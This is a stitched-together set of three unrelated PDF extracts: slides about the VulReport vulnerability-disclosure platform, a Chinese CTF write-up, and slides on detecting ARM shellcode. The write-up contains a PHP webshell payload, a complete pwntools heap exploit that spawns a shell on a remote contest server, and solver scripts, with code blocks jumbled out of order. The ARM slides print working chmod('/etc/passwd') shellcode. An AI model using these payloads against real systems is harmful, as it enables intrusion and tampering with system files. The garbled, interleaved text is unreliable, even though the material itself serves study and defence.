VulReport sylphid@vulreport.net Agenda • 弱點揭露現狀 • 為什麼要建置VulReport • 負責任的弱點揭露 "高超的電腦技術,卻沒有用在正途” zone-h Underground Economy 關於 VulReport • 由 HITCON(Hacks in Taiwan Conf.) 主要成員發起 • 政府、企業與白帽駭客間的溝通管道及技術交流平台 • 藉由此平台讓政府單位或企業正視漏洞問題 • 增進資安相關訊息的交流 別讓駭客不開心 • 黑色產業 -> 資安產業/公益 • 技術的交流與提昇 • 正面形象的轉變 Google VRP - 1 Google VRP - 2 Google Project Zero - 1 Google Project Zero - 2 Alibaba 烏雲 - 1 烏雲 - 台灣 “台灣是全球殭屍網路第四大國” 全世界都留一手 漏洞 - 資安攻防的關鍵 關於 VulReport • 由 HITCON(Hacks in Taiwan Conf.) 主要成員發起 • 政府、企業與白帽駭客間的溝通管道及技術交流平台 • 藉由此平台讓政府單位或企業正視漏洞問題 • 增進資安相關訊息的交流 為何建置VulReport • 台灣版的弱點資料庫 • 在地化通報及溝通讓修補時間縮短 • 提供NGO/無自行修復能力的小型企業修補服務或諮詢 • 提供學校資安社團參與資安弱點修補實務訓練 • 整合原本零散的安全研究人員或社群 • 提升台灣整體資安防禦實力 漏洞通報範例 • 漏洞揭露流程 • 弱點審核(5人天) • 廠商/企業組織弱點通知與確認(5人天) • 對安全合作夥伴公開 (3天) • 向核心成員及相關領域專家公開(10天) • 對大眾公開(30/45/65/90天) VulReport 使用規範與聲明 刑法 第三六章 妨害電腦使用罪 • 第 358 條 無故輸入他人帳號密碼、破解使用電腦之保護措施或利用電腦系統之漏洞 ,而入侵他人之電腦或其相關設備者,處三年以下有期徒刑、拘役或科或 併科十萬元以下罰金。 • 第 359 條 無故取得、刪除或變更他人電腦或其相關設備之電磁紀錄,致生損害於公 眾或他人者,處五年以下有期徒刑、拘役或科或併科二十萬元以下罰金。 • 第 360 條 無故以電腦程式或其他電磁方式干擾他人電腦或其相關設備,致生損害於 公眾或他人者,處三年以下有期徒刑、拘役或科或併科十萬元以下罰金。 • 第 361 條 對於公務機關之電腦或其相關設備犯前三條之罪者,加重其刑至二分之一 。 • 第 362 條 製作專供犯本章之罪之電腦程式,而供自己或他人犯本章之罪,致生損害 於公眾或他人者,處五年以下有期徒刑、拘役或科或併科二十萬元以下罰 金。 • 第 363 條 第三百五十八條至第三百六十條之罪,須告訴乃論。 VulReport 里程碑 • 2014 Q1 開始籌備 • 2014 Q2 網站雛形(HITCON FreeTalk 短暫公開) • 2014/11/24 公開測試 • 2014/12/23 粉絲團 500 讚(藉由社群力量宣傳及擴散) • 2015/01/9 公開記者會 • 2015/01/10 公測/第一屆VR漏洞積分賽結束 漏洞積分排名 (2015⅛) 通報漏洞統計 (2015/1/8) • 政府: 11 • 企業: 36 • 學校: 13 • NGO: 5 • VulReport: 5 VulReport 企業帳號 • 等級: 免費/正式/黃金/鑽石 • 優先通知漏洞通報 • 通報期限: 30/45/65/90 • 資安諮詢服務 • Logo連結 • 資安人才招聘 • 漏洞資訊提供研究 • 資安產品或服務推薦 • 對外服務檢測(研議中) • 詳見: http://goo.gl/9cbFgN wiki - responsible disclosure Responsible Vulnerability Disclosure Process Security Response Center 責任揭密政策 - Uber responsible disclosure policy -1 responsible disclosure policy -2 responsible disclosure policy - 3 VulReport 未來規劃 • Happy Hackers ☺ VulReport WEB: https://vulreport.net/ FB: facebook.com/vulreport
pdf
护网杯WP-Nu1L 护网杯WP-Nu1L WEB 签到 SQLManager SimpleCalculator easyphp Pwn logger Crypto Signsystem 2EM Re gocrypt WEB 签到 js里有 SQLManager 原题:https://www.anquanke.com/post/id/200927#h3-6 SimpleCalculator 国赛原题 easyphp 读源码/index.php?page=php://filter/read=convert.base64-encode/resource=index.php,绕过死亡 die,写入aPD9waHAgZXZhbCgkX1BPU1RbY10pOz8%2B。然后包含 page=php://filter/read=convert.base64- decode/resource=sandbox/xxxxxxxx/aPD9waHAgZXZhbCgkX1BPU1RbY10pOz8%2B Pwn logger ?search=${~%A0%B8%BA%AB}[1](${~%A0%B8%BA%AB}[2])&1=phpinfo&2=0 from pwn import * # context.log_level = 'debug' # p = process('./logger') p = remote('39.105.35.195', 15333) def launch_gdb():    context.terminal = ['xfce4-terminal', '-x', 'sh', '-c']    gdb.attach(proc.pidof(p)[0]) def once(i,c):    p.recvuntil('Exit')    p.sendline('2')    p.recvuntil('Content:')    p.send(c + '\x00')    p.recvuntil('ID:')    p.sendline(str(i)) def pwarn(c):    p.recvuntil('Exit')    p.sendline('1')    p.recvuntil('Content:')    p.send(c) def write_addr(addr,value):    base = 0x67F7B0    for i in xrange(len(value)):        # if ord(value[i]) == 0: continue        once(addr - base + i,'a' * ord(value[i])) write_addr(0x67E020,p64(0x067F7A0)) pwarn('aa') p.recvuntil('LOG: ') leak = u64((''+ p.recvuntil(': aa',drop=True)).ljust(8,'\x00')) log.info('leak libc ' + hex(leak)) # launch_gdb() libc_base = leak - 3953984 environ = 3960632 + libc_base io_vtable = 3954424 + libc_base fake_io = libc_base + 3954115 write_addr(0x67f7b0,p64(fake_io)) write_addr(0x67f7b0 + 0xd8,p64(0x67f8b0)) '''           Update with: $ gem update one_gadget && gem cleanup one_gadget 0x45226 execve("/bin/sh", rsp+0x30, environ) constraints: rax == NULL 0x4527a execve("/bin/sh", rsp+0x30, environ) constraints: [rsp+0x30] == NULL 0xf0364 execve("/bin/sh", rsp+0x50, environ) constraints: [rsp+0x50] == NULL 0xf1207 execve("/bin/sh", rsp+0x70, environ) constraints: [rsp+0x70] == NULL ''' write_addr(0x67f8b0 + 0x38,p64(libc_base +0xf1207)) Crypto Signsystem 本来以为是一个RSA的签名,没想到 encrypt 函数不是pow。 本地测试后,发现 encrypt(i, e, N) + encrypt(-i, e, N) == N 。 发一个-secret过去就能绕过check了,应该是个非预期。。 # log.info('environ : ' + hex(0x67F7B0)) write_addr(0x67F7A0,p64(0x67F7B0)) p.recvuntil('Exit') p.sendline('4') p.interactive() # !/usr/bin/env python3 import re, string from hashlib import sha256 from itertools import product from pwn import * r = remote("39.107.252.238", 10093) context.log_level = 'debug' # PoW rec = r.recvline().decode() suffix = re.findall(r'XXXX\+([^\)]+)', rec)[0] digest = re.findall(r'== ([^\n]+)', rec)[0] print(f"suffix: {suffix} \ndigest: {digest}") print('Calculating hash...') for i in product(string.ascii_letters + string.digits, repeat=4):    prefix = ''.join(i)    guess = prefix + suffix    if sha256(guess.encode()).hexdigest() == digest:        print(guess)        break r.sendafter(b'Give me XXXX:', prefix.encode()) e = 65537 r.recvuntil(b"65537 ") n = int(r.recvline()) r.recvuntil(b"The secret is ") secret = int(r.recvline()) print(n, secret) r.sendlineafter(b"plaintext:", str(-secret).encode()) r.recvuntil(b"is ") sig_neg = int(r.recvline()) sig = n - sig_neg 2EM 分析代码后,得到加密流程如下: r.sendlineafter(b"plaintext:", str(0).encode()) r.sendlineafter(b"flag", str(sig).encode()) r.interactive() xor key和pbox都是线性变化,可以用一个在GF(2)上的32*32的矩阵来表示,但是里面pbox1和pbox2 都是不可逆的,所以求不出这个矩阵。 看了一下key的位数也不是很大(才32位),encrypt函数在python里调用一下大概也就4.5微秒,48核 服务器,10min就能爆出来。 import multiprocessing as mp from tqdm import tqdm pbox1 = [22, 28, 2, 21, 3, 26, 6, 14, 7, 16, 15, 9, 17, 19, 8, 11, 10, 1, 13, 31, 23, 12, 0, 27, 4, 18, 30, 29, 24, 20, 5, 25] pbox2 = [17, 6, 7, 27, 4, 20, 11, 22, 2, 19, 9, 24, 23, 31, 15, 10, 18, 28, 5, 0, 16, 29, 25, 8, 3, 21, 30, 12, 14, 13, 1, 26] def p(data,pbox):    tmp = bin(data)[2:].rjust(32,'0')    out = [ tmp[x] for x in pbox ]    return int(''.join(out),2) def encrypt(key,msg):    tmp1 = p(msg^key,pbox1)    tmp2 = p(tmp1^key,pbox2)    return tmp2^key def bruteforce(ranges):    start, end = ranges    for key in range(start, end): 能够得到4个key:1991722937, 2091272121, 1390799730, 1492446066 解密就完事了:        if key % 10000000 == 0:            print(key)        if encrypt(key, 3972024911) == 3661089527:            print("find: 1", key)            if encrypt(key, 722713049) == 756849098:                print("find: 2", key) def main():    CPU_CORE_NUM = 48    with mp.Pool(CPU_CORE_NUM) as pool:        reslist = pool.imap_unordered(bruteforce, [(i, i+89478487) for i in range(0, 2**32, 2**32//48)])        for res in reslist:            pool.wait() if __name__ == "__main__":    main() from Crypto.Util.number import long_to_bytes pbox1 = [22, 28, 2, 21, 3, 26, 6, 14, 7, 16, 15, 9, 17, 19, 8, 11, 10, 1, 13, 31, 23, 12, 0, 27, 4, 18, 30, 29, 24, 20, 5, 25] pbox2 = [17, 6, 7, 27, 4, 20, 11, 22, 2, 19, 9, 24, 23, 31, 15, 10, 18, 28, 5, 0, 16, 29, 25, 8, 3, 21, 30, 12, 14, 13, 1, 26] def inv_pbox(data, pbox):    tmp = bin(data)[2:].rjust(32,'0')    out = [tmp[pbox.index(i)] for i in range(32)]    return int(''.join(out),2) def dec(key, c):    tmp1 = inv_pbox(c ^ key, pbox2)    tmp2 = inv_pbox(tmp1 ^ key, pbox1)    return tmp2 ^ key enc_flag = [2670163133, 2168059145, 2670163133, 2168059145, 2640667901, 1361473960, 4285198444, 1462920522, 1669035357, 1836344829, 292090312, 1735062728, 2338346668] keys = [1991722937, 2091272121, 1390799730, 1492446066] for key in keys:    plain = b""    for enc in enc_flag:        plain += long_to_bytes(dec(key, enc))    print(plain) # b'flag{843flag{843f4cf5-8edc-49e7-9fd2-7cb31840c10f}\x00\x00' # b'flag{843flag{843f4cf5-8edc-49e7-9fd2-7cb31840c10f}\x00\x00' # b'flag{843flag{843f4cf5-8edc-49e7-9fd2-7cb31840c10f}\x00\x00' # b'flag{843flag{843f4cf5-8edc-49e7-9fd2-7cb31840c10f}\x00\x00' Re 5G # https://github.com/albusSimba/pyPolar/tree/master/polarcodes5G from polarcodes5G import * if __name__ == '__main__':    snr = 4    n = 1024    k = n // 2    myPC = Construct(n, k)    myPC.llrs = np.array([-1.756208,1.027628,-0.952465,-1.638855,-1.462390,0.208588,0.591268,-0. 179454,1.095095,0.447900,0.947692,1.350273,-1.155633,-1.938154,0.046054,1.175568 ,-0.007052,1.220866,1.890119,1.539061,0.677526,-0.493938,1.113000,1.148966,0.437 962,-1.025365,-1.001201,-0.274902,0.545109,-1.125495,-1.112381,0.214771,0.635569 ,-1.382093,0.053726,-0.196021,1.320305,-1.337450,0.422620,0.553210,0.785358,-0.6 78043,-0.368721,1.188093,-0.338528,-1.537577,1.670443,-0.885858,0.070331,-1.2159 92,1.823989,-0.929618,-0.727060,2.505745,-1.036676,-0.280815,2.160959,1.733216,- 1.889883,-0.109916,1.367643,1.077257,1.312840,1.304816,1.097788,-0.926799,-1.469 581,0.996823,0.467300,1.904864,1.661034,0.435124,0.383811,-0.786075,-0.330117,1. 344677,1.444533,0.003463,-0.926323,-0.978224,-0.226969,1.102106,0.226237,-0.3843 20,-0.466343,-0.498517,1.842003,0.942432,-1.294573,1.018581,1.164019,-0.128555,0 .020977,-1.208346,-1.123887,-0.032598,-1.408865,0.524717,0.321672,0.852049,-1.98 8844,0.746240,-1.961841,1.564997,1.804899,-0.908426,0.896699,1.734691,-0.999090, -0.642587,-0.406924,-1.165598,1.083971,-2.301489,1.351427,0.980320,0.417626,0.61 6401,1.134201,-0.563215,-0.877332,1.501646,0.681555,-1.702605,0.523019,-1.081125 ,0.107362,2.058186,0.326459,-1.787194,1.086192,-1.055046,-1.685858,-0.930215,-0. 894009,-0.677912,0.511197,-1.098572,-0.788927,0.177513,2.140012,0.966361,0.86581 9,0.819131,-1.699320,1.568498,1.525463,-0.655758,-0.581384,-1.229248,2.183221,0. 335959,-2.642757,1.013924,-1.168649,-1.458181,-1.138616,1.700769,-0.382989,-1.72 6020,-1.532635,-0.541429,-0.968800,-0.192087,-0.507234,0.543382,1.457708,-0.0755 56,1.669304,-2.206753,-0.921022,0.900948,-0.924948,0.040101,0.633460,-1.306462,- 0.804734,0.755951,-0.342759,1.752969,-1.201860,0.799820,0.219841,3.060129,1.5517 59,1.246884,1.430198,1.411848,2.321447,-2.062636,0.958560,-0.646293,-0.980863,-0 .387100,2.045299,0.567460,-2.215653,-1.403319,0.556241,2.651569,0.292166,-0.6983 75,0.832029,-2.139115,2.283352,-1.264334,-2.478704,0.270772,-0.142261,1.136285,- 1.642062,2.994728,0.482550,-1.129786,1.177546,-0.834284,0.712862,1.140268,0.2384 46,0.362353,1.575962,-1.355559,-1.180508,1.677377,-2.135500,-2.669384,-1.522473, 0.875878,-1.008801,-0.618179,0.555532,-0.406354,-0.318404,-0.630576,1.610498,-0. 477984,0.164362,-0.830112,-1.618440,0.886848,-1.226787,-1.135281,-0.954352,-0.99 7209,1.752468,-1.700439,-1.117883,-1.989664,1.488250,-0.569408,-0.814622,-0.9165 72,1.091514,0.165200,-0.153607,2.313688,1.527322,0.994576,1.399933,0.158282,-0.1 25025,0.429315,0.516940,0.672170,1.749239,0.822672,1.568959,2.138455,-2.220479,- 0.936637,-0.634800,0.167569,-0.665847,-1.437416,-1.280923,-0.400447,1.498225,1.0 53262,-0.320818,-1.868225,-1.496732,-0.201518,0.034030,-1.689186,0.614880,0.4277 27,-1.621376,-0.546353,-0.321909,-0.611334,-0.587016,-2.244846,-0.323138,-2.0808 39,-0.953925,2.650594,-0.162808,-1.376487,-0.924629,-1.691688,0.856848,1.097273, -1.544046,-0.646544,0.317479,-1.250199,-1.017597,1.060770,2.751512,-1.258838,-1. 488311,-1.143038,-1.744919,1.170522,0.839760,1.910438,0.995595,-0.787186,1.42375 3,-0.880153,0.862203,-1.500974,-1.260939,-1.803650,0.943106,-1.368411,1.251217,- 0.557028,0.652139,-0.203996,1.187680,-0.416745,0.581558,-2.265760,-0.474873,0.08 0722,0.446179,-0.639327,-1.647740,-0.858419,-1.402387,-1.525324,1.104080,-1.6400 21,-0.647639,0.401717,-0.708741,1.263550,-0.275298,-2.248850,-0.774760,-0.636558 ,0.562457,0.608792,-1.490242,1.013421,0.278254,-0.781737,1.277366,-0.138126,-1.1 45646,-1.050219,0.291015,0.928961,0.018285,1.004116,2.008026,1.663652,0.840205,1 .424996,0.025048,-0.621860,-0.606348,-0.535632,1.306148,-0.050246,0.503134,0.975 046,1.150712,0.578937,0.213607,-1.477498,-0.974311,-0.985866,1.014662,-0.377609, -0.888818,-0.157905,-0.662982,-0.023800,-1.711486,-0.533030,0.483448,1.421968,-2 .673275,1.159374,-0.940826,-0.491770,0.951219,-0.416862,2.044601,-1.385406,1.740 491,0.929469,1.990168,0.754986,0.493125,0.315357,2.287613,0.947665,0.981003,-0.0 81702,1.255644,-0.777866,0.239122,1.275812,-0.636307,-0.966732,-1.012288,-0.5020 24,-0.879887,0.827306,-1.783475,-0.860583,0.353817,0.168019,-1.668560,0.639837,- 0.569348,0.387230,-1.952601,-0.039584,1.421421,0.157275,-0.895116,0.686452,-0.13 2425,-1.078567,1.616315,0.187555,-1.789372,1.171706,-0.989204,1.267153,0.731109, 1.130974,1.013797,-1.417835,-0.366101,0.438512,0.175359,0.853008,1.330899,1.3720 95,-0.052560,1.212500,0.748895,-0.449058,0.549911,0.182876,0.442336,1.084044,-1. 253650,-1.216360,2.299248,0.949407,0.956618,-1.152720,1.548854,-1.217456,-0.6026 14,-1.319584,-1.529696,1.540484,0.085620,-0.259641,-1.169200,-1.316670,1.516454, 1.483575,-1.333522,-0.343909,2.483338,1.936281,1.029471,0.360799,1.331956,-1.821 326,1.351405,-1.601415,0.524290,1.610703,1.691951,0.163450,-1.426074,1.286014,1. 070039,-1.825795,0.345390,0.219903,0.242906,-2.677871,0.952509,0.676549,-1.49237 0,1.547383,0.842538,0.608756,1.544244,0.872889,1.056120,-0.815245,0.111029,1.119 361,1.297144,-0.816438,1.573819,-0.848893,-2.928262,1.679499,1.159596,1.162540,- 1.863993,-1.254509,0.235468,-1.995178,0.604137,0.418380,0.708372,-1.183634,-0.97 1074,-1.223639,-0.919511,1.732817,-1.438610,1.545408,0.773104,-0.665660,-2.85787 4,1.415942,0.318007,-1.460877,1.478659,1.770448,0.975247,-0.079748,0.294747,0.43 9699,-0.877530,-1.121686,-1.710442,-0.498951,-1.236182,1.044201,-0.663160,1.0558 91,-1.578814,0.193263,1.311887,-1.084890,1.985518,-1.931899,-1.383116,-1.545790, 1.745142,-0.031644,1.473162,-1.170931,0.655801,-1.098930,-0.534768,-0.665807,0.7 40223,-0.730671,-1.029297,-1.005241,1.826314,-0.404923,-0.630124,-0.629364,-0.83 6373,-1.028782,-0.611658,-1.257369,-0.211007,-0.260421,-1.245970,0.772906,0.3783 62,-0.268652,0.808594,-1.411757,-0.612535,-2.272360,-0.228131,-0.443235,-2.51657 4,-1.144369,-0.964743,1.712300,-1.124629,-1.010093,0.539167,0.665459,-1.403211,- 0.760302,1.030342,0.254316,-1.158366,0.070782,0.662044,-1.219957,1.170861,-1.176 705,1.254579,-0.337905,2.079939,-0.861711,-1.241954,1.464957,-1.263635,1.001572, 1.545965,-2.070062,-0.353566,-1.174587,1.506927,-1.627372,-1.760972,-0.488558,-1 .083162,1.686407,0.613915,1.478201,0.851858,-0.251025,-0.715657,0.839277,-0.4712 78,1.666910,-1.305724,0.207877,-0.782153,1.437165,0.391036,0.566202,-0.820490,-1 .812838,-0.971692,0.533639,-1.672531,0.742608,-0.149614,-1.415937,-0.425910,0.80 9999,-0.852938,-1.790981,-1.601163,1.259779,0.075128,0.992202,-1.824626,-0.78762 6,0.889884,-1.593672,0.361373,0.683634,0.759840,2.499078,-0.260520,-0.001256,0.0 77253,0.638311,0.915541,-1.264309,0.908796,1.749505,0.203023,-1.349913,-0.694795 ,-0.533181,0.196796,2.068641,-1.771991,-1.772555,1.031747,1.357292,0.515132,1.09 5595,0.787838,-0.891284,-0.873648,-0.540499,1.118793,-1.008829,1.001822,1.475295 ,-0.235384,0.911150,-1.309131,-0.667266,0.393816,1.209631,0.873938,-1.828244,1.5 98177,2.263789,1.002235,1.210132,1.289583,0.513601,1.066601,1.919225,-0.038854,0 .785423,-1.378313,-0.489039,-0.737576,0.740496,-1.549859,-0.630046,-0.741761,-0. 776671,1.027740,1.194698,-2.153944,0.165189,1.068851,-1.525878,-1.270413,-0.3073 92,0.606630,0.875528,1.319129,0.932650,-2.396184,-1.670689,-0.970916,-0.640245,- 0.317383,-1.683889,-0.821281,-0.237230,1.431572,-0.542698,-0.502644,0.886885,-1. 100686,-1.784364,2.419862,1.813997,1.615762,-0.329475,-1.406073,-1.263815,-0.334 627,1.511375,-0.142354,-0.705305,0.973276,-1.008616,0.831885,0.351780,-0.719506, -1.335891,-0.292763,0.847991,0.650468,-1.220291,0.578187,0.490888,0.785455,-1.99 1540,1.001481,2.183888,1.668484,1.246759,-0.308238,0.882280,0.161352,1.661957,1. 284550,-0.659829,-1.704962,1.644762,0.755891,-0.971527,-1.385948,0.811347,-0.788 184,0.811639,0.511516,1.738585,1.222464,0.200433,-0.261166,-1.716991,-1.357552,0 .777731,-1.509324,1.380187,-1.326519,2.621346,-1.151132,-1.213965,-0.706548,2.03 7775,-0.978766,-1.948199,-1.422289,-0.308394,-0.321063,-0.671179,1.743509,-0.916 104,-0.646811,0.798050,0.227600,-0.747514,0.966163,-0.849931,-0.870559,0.580033, -1.414398,-0.787516,-0.579751,-0.857700,-0.725267,1.258908,1.193013,-0.944402,-1 .125168,-0.071414,0.556080,0.937239,1.123537,-0.467957,0.213163,-0.348893,1.8557 07,0.869807,1.543800,1.057733,1.197158,1.430461,1.216461,-1.981625,-0.891747,1.4 90889,-0.828894,-2.151780,-0.702172,0.174841,0.446801,0.383394,1.340564,0.355664 ,1.221384,-0.483424,-0.857405,1.572598,-1.016775,-1.907503,1.381660,2.303773,-0. 084389,-0.426852,1.031473,1.262251,1.299562,2.359286,1.455153,1.378195,-1.559384 ,-1.538619,-0.662412,-0.372804,2.039874,-1.584868,-2.033444,-1.067252,-0.659223, -2.496581,-0.954072,0.669460,0.049117,1.128368,-1.664469,-0.261416,-1.179493,0.2 50286,-1.845250,1.491571,-0.765835,1.287766,0.792848,-0.086404,-1.610287,-2.1527 91,0.913082,0.285700,1.872948,1.865199,-1.566768,-1.159276,-0.829504,-1.917198,1 .277626,-1.208782,1.105732,0.981907,0.481393,1.191567,-0.292485,0.247654,1.28576 4,1.419050,0.491073,-1.984844,1.692819,1.603780,1.449216,-0.039562,-1.201645,-0. 939811,2.001579,-0.336064,0.990034,1.993080,-1.491785,0.237822,-0.793874,0.74992 5,-0.392913,0.945575,0.879344,0.826050,1.742768,-0.785224,0.924833,-2.199665,0.8 45972,-1.534836,1.463299,1.242056,1.841817,1.839877,0.341948,0.343022,-2.024360, 0.642739,-1.273309,1.215190,-1.616881,0.676320,-0.679882,1.037747,-0.467504,-0.3 38021,-1.717130,0.915148,-1.249030,0.770539,-1.123067,0.971105,0.615920,-0.29155 gocrypt 8,1.023345,2.343940,-1.123161,1.449990,-0.047304,-0.965352,1.850657,0.472787,0.2 42035,0.649792,0.128146,-2.427828,1.121717,-1.045283,-0.183920,-0.859471,0.72476 5,1.519884,0.136659,1.124708,-1.212589,-1.327331,0.718455,-0.439775,-0.973812,-0 .933761,-2.748310,-1.769533,-1.256789,0.821586,1.832475,-1.706277,1.075026,0.416 075,0.442156,-1.945941,0.796463,2.056993,-0.842647,-0.529708,0.516552,-0.964007, -1.274050,0.742747,0.342178,2.025093,-2.075699,-0.621430,-1.372903,1.563129,2.35 8205,-0.270784,1.102009,-1.224852,-0.975096,1.056610])    Decoder(myPC)    dec = myPC.message_received[myPC.msg_bits]    result = []    for i in range(len(dec)//8):        tmp = 0        for j in range(8):            tmp |= (dec[i*8+j] << j)        result.append(tmp)    print(bytearray(result).decode()) from z3 import * from struct import pack key = [[0xdaab, 0x2821, 0xa22c, 0x91c0, 0x7edf, 0x54c5, 0xc2e9, 0xe82d, 0xf84b, 0xbed8, 0x58be, 0xc8c, 0x6932, 0x8a68, 0xaf7d, 0x5d6b, 0x95d, 0x2ab, 0x1972, 0x74e3, 0xab63, 0xda13, 0xa319, 0xaa70], [0xb5f1, 0x334b, 0x5a87, 0xb694, 0x9bba, 0x10cb, 0x91cd, 0x7bc, 0xf84b, 0xbed8, 0x58be, 0xc8c, 0x6932, 0x8a68, 0xaf7d, 0x5d6b, 0x95d, 0x2ab, 0x1972, 0x74e3, 0xab63, 0xda13, 0xa319, 0xaa70], [0x2710, 0x8f50, 0x8385, 0xa074, 0x9d8c, 0xa8cc, 0xe992, 0x15b1, 0xf84b, 0xbed8, 0x58be, 0xc8c, 0x6932, 0x8a68, 0xaf7d, 0x5d6b, 0x95d, 0x2ab, 0x1972, 0x74e3, 0xab63, 0xda13, 0xa319, 0xaa70], [0x98a3, 0x9a50, 0xb941, 0x4fc3, 0x1005, 0x88b2, 0x605a, 0xa823, 0xf84b, 0xbed8, 0x58be, 0xc8c, 0x6932, 0x8a68, 0xaf7d, 0x5d6b, 0x95d, 0x2ab, 0x1972, 0x74e3, 0xab63, 0xda13, 0xa319, 0xaa70]] dst = [0xf84b, 0xbed8, 0x58be, 0xc8c, 0x6932, 0x8a68, 0xaf7d, 0x5d6b, 0x95d, 0x2ab, 0x1972, 0x74e3, 0xab63, 0xda13, 0xa319, 0xaa70] def rol(val, n):    return ((val << n)&0xffff) | LShR(val, (16-n)) for i in range(len(dst)//4):    _first = BitVec(f'v0', 16)    _second = BitVec(f'v1', 16)    _third = BitVec(f'v2', 16)    _fourth = BitVec(f'v3', 16)    first = _first    second = _second    third = _third    fourth = _fourth    v18 = 0    while v18 < 7:        v21 = third        v22 = ((fourth & third) + key[i][v18] + first)&0xffff        v23 = fourth        v24 = (v22 + (second & ~fourth))&0xffff        v25 = (second + key[i][v18 + 1])&0xffff        v24 = rol(v24, 1)        v26 = v23        v27 = ((v24 & v23) + v25)&0xffff        v28 = v24        v29 = (v27 + (v21 & ~v24))&0xffff        v30 = (v21 + key[i][v18 + 2])&0xffff        v29 = rol(v29, 2)        v31 = v29        v32 = (v30 + (v28 & v29))&0xffff        v33 = v31        v34 = ((v26 & ~v31) + v32) & 0xffff        v19 = (v26 + key[i][v18 + 3])&0xffff        v34 = rol(v34, 3)        second = v33        a6 = ((v34 & v33) + v19)&0xffff        v20 = v34        fourth = (a6 + (v28 & ~v34))&0xffff        v18 += 4        fourth = rol(fourth, 5)        first = v28        third = v20    s = Solver()    s.add(first == dst[0+i*4])    s.add(second == dst[1+i*4])    s.add(third == dst[2+i*4])    s.add(fourth == dst[3+i*4])    assert s.check() == sat    m = s.model()    v = [_first, _second, _third, _fourth]    for each in v:        print(pack('>H', 0xffff&((m[each].as_long()>>8) | (m[each].as_long() << 8))).decode(), end='')
pdf
Shellcodes for ARM: Your Pills Don’t Work on Me, x86 Svetlana Gaivoronski @SadieSv Ivan Petrov @_IvanPetrov_ Why it’s important ! ! !Increasing!number!of!ARM3based!devices! ! !Significant!number!of!vulnerable!so:ware! !!!!!!!and!huge!base!of!reusable!code! ! !Memory!corrup?on!errors!are!s?ll!there! @SadieSv!!!!!!!@_IvanPetrov_! Is it decidable? Ac?vator! • NOP! • GetPC! Decryptor! Payload! Return!address!zone! ! !Structure!limita?ons!! ! !Size!limita?ons! @SadieSv!!!!!!!@_IvanPetrov_! May be it’s not that bad? ! !Stack!canaries:!calculates!pseudo<random! number!and!saves!it!to!the!stack;! ! !SafeSEH:!instead!of!protecDng!stack!protects! excepDon!handlers!;!! ! !DEP:!makes!stack/part!of!stack!non< executable;!! ! !ASLR:!randomizes!he!base!address!of! executables,!stack!and!heap!in!a!process’s! adress!space!.! BYPASSED @SadieSv!!!!!!!@_IvanPetrov_! Okay, what’s the ARM problem? ! !Shellcodes!are!already! there! ! ! !Shellcode!detec?ons! methods!(okay,&“smarter”& than&signature3based)!are! not…!! Are x86-based methods are applicable here? For analysis of appicapability of х86–based techniques for ARM it’s reasonable to understand differences of two platforms. @SadieSv!!!!!!!@_IvanPetrov_! Main differences of two platforms: ! Commands!size!is!fixed;! ! 2!different!CPU!modes!(32bit!and!16bit)and!possibility!to! dynamic!switching!between!them; ! Possibility!of!condiDonal!instrucDon!execuDon; ! Possibility!of!direct!access!to!PC; ! load<store!architecture!(not!possible!to!access!memory! directly!from!arithmeDc!instrucDons); ! FuncDon!arguments!(and!return!address!as!well)!go!to! registers,!not!stack. @SadieSv!!!!!!!@_IvanPetrov_! i!f!(!e!r!r!!=!0)! !p!r!i!n!t!f!(!"!Er!r!o!r!c!o!d!e!=!%i!\!n!"!,!e!r!r!)!;! e!l!s!e! !p!r!i!n!t!f!(!"OK!!\!n!"!)!;! ! ! !!!!CMP!r1!,!#0! !!!!BEQ!.!L4! !!!!LDR!r0!,!<!string_1_address!>! !!!!BL!prin]! !!!!B!.!L8! .!L4!:! !!!!LDR!r0!,!<!string_2_address!>! !!!!BL!prin]! .!L8!:! CMP!r1!,!#0! LDRNE!r0!,!<!string_1_address!>! LDREQ!r0!,!<!string_2_address!>! BL!prin]! Without!condi?onal! instruc?ons! With!condi?onal! instruc?ons! Condi?onal!execu?on! @SadieSv!!!!!!!@_IvanPetrov_! Thumb!!CPU mode! ! chmod("/etc/passwd",!0777)!3!31!byte! !! "\x78\x46"!!!!!!!!!!!!!!!!!!!//!mov!!r0,!pc !! "\x10\x30"!!!!!!!!!!!!!!!!!!!//!adds!r0,!#16 !! "\xff\x21"!!!!!!!!!!!!!!!!!!!!!//!movs!r1,!#255!!!!;!0xff!! "\xff\x31"!!!!!!!!!!!!!!!!!!!!!//!adds!r1,!#255!!!!;!0xff !! "\x01\x31"!!!!!!!!!!!!!!!!!!!//!adds!r1,!#1 !! "\x0f\x37"!!!!!!!!!!!!!!!!!!!!//!adds!r7,!#15 !! "\x01\xdf"!!!!!!!!!!!!!!!!!!!!//!svc!!1 !;!chmod(..)! "\x40\x40"!!!!!!!!!!!!!!!!!!!//!eors!r0,!r0!! "\x01\x27"!!!!!!!!!!!!!!!!!!!//!movs!r7,!#1 !! "\x01\xdf"!!!!!!!!!!!!!!!!!!!!//!svc!!1 !;!exit(0)! "\x2f\x65\x74\x63"!!!! !! "\x2f\x70\x61\x73"!!!! !! "\x73\x77"!!!!!!!!!!!!!!!!!!! !! "\x64”! ! chmod("/etc/passwd",!0777)!3!51!byte! ! "\x0f\x00\xa0\xe1"! !!//!mov !r0,!pc! "\x20\x00\x90\xe2"! !!//!adds !r0,!r0,!#32! "\xff\x10\xb0\xe3"! !!//!movs !r1,!#255 !;!0xff! "\xff\x10\x91\xe2"! !!//!adds !r1,!r1,!#255!;!0xff! "\x01\x10\x91\xe2"! !!//!adds !r1,!r1,!#1! "\x0f\x70\x97\xe2"! !!//!adds !r7,!r7,!#15! "\x01\x00\x00\xef"! !!//!svc !1! "\x00\x00\x30\xe0"! !!//!eors !r0,!r0,!r0! "\x01\x70\xb0\xe3"! !!//!movs !r7,!#1! "\x01\x00\x00\xef"! !!//!svc !1! "\x2f\x65\x74\x63"!!!!!!!! !! "\x2f\x70\x61\x73"!!!!!!!! !! "\x73\x77"!!!!!!!!!!!!!!!!!!!!!!! !! "\x64"! ! Thumb!mode! ARM!mode! @SadieSv!!!!!!!@_IvanPetrov_! Local recap Sta?c!analysis! Dynamic!analysis!! @SadieSv!!!!!!!@_IvanPetrov_! What cause such problems (mostly) New!obfusca?on!techniques:! 1.!!!CondiDonal!execuDon;! 2.!!!AddiDonal!CPU!mode.! @SadieSv!!!!!!!@_IvanPetrov_! The next step? ! We!already!have!(sDll!on<going)!work!on!x86! !!!!!shellcodes!detecDon:! !–!Set!of!features!! ! ! Are!they!features!of!ARM<based!shellcodes!! !!!!!too?! ! ! Can!we!idenDfy!something!new?! Static features • 